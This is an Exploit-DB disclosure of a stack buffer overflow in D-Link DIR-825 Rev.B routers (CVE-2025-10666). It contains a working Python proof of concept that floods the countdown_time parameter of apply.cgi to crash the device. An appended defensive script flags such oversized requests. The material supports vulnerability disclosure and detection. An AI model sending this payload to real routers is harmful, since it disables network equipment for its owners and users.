[hardware] D-Link DIR-825 Rev.B 2.10 - Stack Buffer Overflow (DoS)
Exploit DB
Archived Mar 16, 2026
EDB-ID: 52469
CVE: 2025-10666
EDB Verified:
Author: BEATRIZ FRESNO NAUMOVA
Type: HARDWARE
Platform: MULTIPLE
Date: 2026-02-02
# Exploit Title: D-Link DIR-825 Rev.B 2.10 - Stack Buffer Overflow (DoS)
# Google Dork: N/A
# Date: 2025-09-25
# Exploit Author: Beatriz Fresno Naumova
# Vendor Homepage: https://www.dlink.com/
# Software Link: https://tsd.dlink.com.tw/downloads2008detail.asp
# Version: DIR-825 Rev.B <= 2.10
# Tested on: DIR-825 Rev.B physical hardware, local network
# CVE: CVE-2025-10666
#
# Description:
# A stack-based buffer overflow vulnerability exists in the apply.cgi endpoint of the
# D-Link DIR-825 Rev.B router (firmware <= 2.10), triggered via the countdown_time parameter.
# This PoC sends an overly long POST parameter to crash the process.

import requests

TARGET = "http://192.168.0.1/apply.cgi"  # Change this to the router's IP
LENGTH = 4000  # Adjust length for testing / fuzzing
PAYLOAD = "1" * LENGTH

headers = {
    "User-Agent": "Mozilla/5.0",
    "Content-Type": "application/x-www-form-urlencoded",
    "Referer": "http://192.168.0.1/",
}

data = {
    "countdown_time": PAYLOAD
}

try:
    print(f"[+] Sending exploit payload ({LENGTH} bytes) to {TARGET}")
    r = requests.post(TARGET, headers=headers, data=data, timeout=5)
    print(f"[+] Status Code: {r.status_code}")
    print("[+] Exploit sent. Check if the router crashes or becomes unresponsive.")
except Exception as e:
    print(f"[-] Failed to send exploit: {e}")
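
An added defensive example, not part of the original Exploit-DB entry: a check that a reverse proxy or log pipeline could run over captured HTTP requests to flag the request shape the PoC above sends to apply.cgi. MAX_LEN, the decimal-only rule, the helper names and the sample requests are assumptions constructed for illustration; the page does not state the size of the affected buffer.

```python
from urllib.parse import parse_qsl, urlsplit

# Assumption: a legitimate countdown_time is a short decimal number. The page does
# not state the buffer size, so MAX_LEN is a conservative, adjustable guess.
MAX_LEN = 16
WATCHED_PATH = "/apply.cgi"
WATCHED_PARAM = "countdown_time"


def inspect_request(raw: bytes) -> list[str]:
    """Return findings for one raw HTTP/1.x request; an empty list means clean."""
    head, _, body = raw.partition(b"\r\n\r\n")
    parts = head.decode("latin-1").split("\r\n")[0].split(" ")
    if len(parts) != 3:
        return ["malformed request line"]
    method, target, _version = parts
    url = urlsplit(target)
    if url.path != WATCHED_PATH:
        return []
    # The parameter may arrive in the POST body (as in the PoC) or the query string.
    pairs = parse_qsl(url.query, keep_blank_values=True)
    if method == "POST":
        pairs += parse_qsl(body.decode("latin-1"), keep_blank_values=True)
    findings = []
    for name, value in pairs:
        if name != WATCHED_PARAM:
            continue
        if len(value) > MAX_LEN:
            findings.append(f"{name} length {len(value)} exceeds {MAX_LEN}")
        if not value.isdigit():
            findings.append(f"{name} is not a decimal number")
    return findings


def build_request(path: str, form: str) -> bytes:
    """Build a constructed sample request for the demo below."""
    return (f"POST {path} HTTP/1.1\r\nHost: 192.168.0.1\r\n"
            "Content-Type: application/x-www-form-urlencoded\r\n"
            f"Content-Length: {len(form)}\r\n\r\n{form}").encode("latin-1")


if __name__ == "__main__":
    samples = {  # constructed sample traffic, not captured from a device
        "normal": build_request("/apply.cgi", "countdown_time=60"),
        "oversized": build_request("/apply.cgi", "countdown_time=" + "1" * 4000),
        "other page": build_request("/login.cgi", "user=admin"),
    }
    for label, raw in samples.items():
        print(label, "->", inspect_request(raw) or "clean")
```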